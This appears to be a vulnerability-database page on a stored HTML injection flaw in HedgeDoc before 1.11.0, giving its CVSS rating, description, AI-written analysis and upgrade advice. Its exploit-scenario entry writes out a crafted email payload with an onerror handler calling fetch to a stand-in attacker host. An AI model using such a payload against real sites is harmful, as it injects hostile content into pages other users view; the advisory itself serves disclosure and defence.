Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network vector, low privileges for registration, user interaction required to view page, scope change affects other users, low C/I due to CSP blocking script execution.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
HedgeDoc is an open source, real-time, collaborative, markdown notes application. Prior to version 1.11.0, due to unsafe handling of the local-part of registered email addresses, HedgeDoc was vulnerable to stored HTML Injection through its publish and slide views. An attacker could register a specially crafted email address and inject arbitrary HTML into pages viewed by other users. HedgeDoc accepted RFC 5321 quoted-string local-parts in email addresses during registration. The local-part was then reused as the user's display name without escaping and rendered into HTML in multiple places, including publish and slide views as well as the collaborative editor. An attacker could break out of an HTML attribute and inject arbitrary markup into the page. While the deployed Content-Security-Policy prevented straightforward inline JavaScript execution, the injected HTML was still sufficient to alter page content and embed attacker-controlled resources such as cross-origin iframes. This issue was fixed in version 1.11.0.
AnalysisAI
Stored HTML injection in HedgeDoc prior to 1.11.0 allows low-privileged, registered attackers to inject arbitrary HTML into publish views, slide views, and the collaborative editor by registering an email address with an RFC 5321 quoted-string local-part, which is then rendered as the display name without output encoding. Victims who view affected pages are exposed to content manipulation and attacker-controlled cross-origin iframe embedding; direct JavaScript execution is mitigated by the deployed Content-Security-Policy, but phishing, UI redressing, and resource injection remain viable. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The attacker must be able to register a new account on the target HedgeDoc instance - this is the primary prerequisite. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 5.1 (AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N) reflects the key mitigating factors: low privileges (PR:L - registration required), passive user interaction (UI:P - a victim must view an affected page), and limited integrity impact bounded by the CSP. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers a HedgeDoc account using an email address such as '"<img src=x onerror=fetch(attacker.com)>"@example.com', causing HedgeDoc to store the unescaped local-part as their display name. When any other user opens a published note or slide deck where this account's display name is rendered, the injected HTML executes in the victim's browser, potentially embedding a cross-origin iframe pointed at an attacker-controlled phishing page within the trusted HedgeDoc origin. … |
| Remediation | Upgrade to HedgeDoc version 1.11.0, which resolves this issue by properly escaping the email local-part before using it as a display name in HTML contexts. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
HedgeDoc is a collaborative platform for writing and sharing markdown. Rated high severity (CVSS 8.7), this vulnerabilit
HedgeDoc is software for creating real-time collaborative markdown notes. Rated high severity (CVSS 8.2), this vulnerabi
HedgeDoc is an open source, real-time, collaborative, markdown notes application. Rated medium severity (CVSS 6.5), this
HedgeDoc is open source software which lets you create real-time collaborative markdown notes. Rated medium severity (CV
HedgeDoc (formerly known as CodiMD) is an open-source collaborative markdown editor. Rated critical severity (CVSS 10.0)
HedgeDoc (formerly known as CodiMD) is an open-source collaborative markdown editor. Rated medium severity (CVSS 5.8), t
Denial of service in HedgeDoc before 1.11.0 lets a user who can store a note crash the instance by embedding a YAML "ali
HedgeDoc is a collaborative platform for writing and sharing markdown. Rated high severity (CVSS 7.5), this vulnerabilit
Rate-limiting bypass in HedgeDoc prior to 1.11.0 permits unauthenticated remote attackers to circumvent brute-force prot
HedgeDoc's GitHub Gist export feature exposes private and protected note content to attacker-controlled GitHub accounts
HedgeDoc is an open source, real-time, collaborative, markdown notes application. Rated medium severity (CVSS 6.4), this
HedgeDoc is a platform to write and share markdown. Rated medium severity (CVSS 6.1), this vulnerability is remotely exp
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today